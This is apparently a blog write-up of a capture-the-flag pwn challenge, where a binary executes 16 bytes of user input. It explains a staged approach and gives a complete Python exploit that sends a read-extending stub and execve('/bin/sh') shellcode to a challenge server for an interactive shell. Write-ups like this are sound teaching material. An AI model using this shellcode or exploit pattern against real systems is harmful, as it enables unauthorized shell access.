- 공유 링크 만들기
- X
- 이메일
- 기타 앱
Binary file is given.
First, I decompiled the binary file. And It was a so simple binary.
But 0x10byte is too small to send a shellcode.
So I decided to use ROP.
rdx is must to not be a too big value. (I have wasted too much time at this point) :(
First, I decompiled the binary file. And It was a so simple binary.
__int64 main()
{
void *buffer;
buffer = mmap(0LL, 0xFFuLL, 7, 34, -1, 0LL);
memset(buffer, 0, 0xFFuLL);
read(0, buffer, 0x10uLL);
((void (__fastcall *)(_QWORD, void *))buffer)(0LL, buffer);
return 0LL;
}
It just make memory map, read 0x10byte from user, and execute code.
But 0x10byte is too small to send a shellcode.
So I decided to use ROP.
0x400606: call 0x400490 <memset plt=""> 0x40060b: mov rax,QWORD PTR [rbp-0x8] 0x40060f: mov edx,0x10 0x400614: mov rsi,rax 0x400617: mov edi,0x0 0x40061c: call 0x4004a0 <read plt=""> // to this address 0x400621: mov rdx,QWORD PTR [rbp-0x8] 0x400625: mov eax,0x0 0x40062a: call rdx 0x40062c: mov eax,0x0 0x400631: leave 0x400632: retI sent 'mov edx, 0x50; mov eax, 0x40061c; call rax' asm code to make the program execute 'read function' and code again. And I Sent the shellcode to obtain the shell.
rdx is must to not be a too big value. (I have wasted too much time at this point) :(
# Attack.py import struct import telnetlib from socket import * HOST = "10.0.66.72" PORT = 6611 s = socket(AF_INET, SOCK_STREAM) s.connect((HOST, PORT)) #exploit! # mov edx, 0x50 # mov eax, 0x40061c # call rax payload = "\xBA\x50\x00\x00\x00\xB8\x1C\x06\x40\x00\xFF\xD0" shellcode = "\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05" s.send(payload + "\n") s.send(shellcode + "\n") t = telnetlib.Telnet() t.sock = s t.interact() s.close()
댓글
댓글 쓰기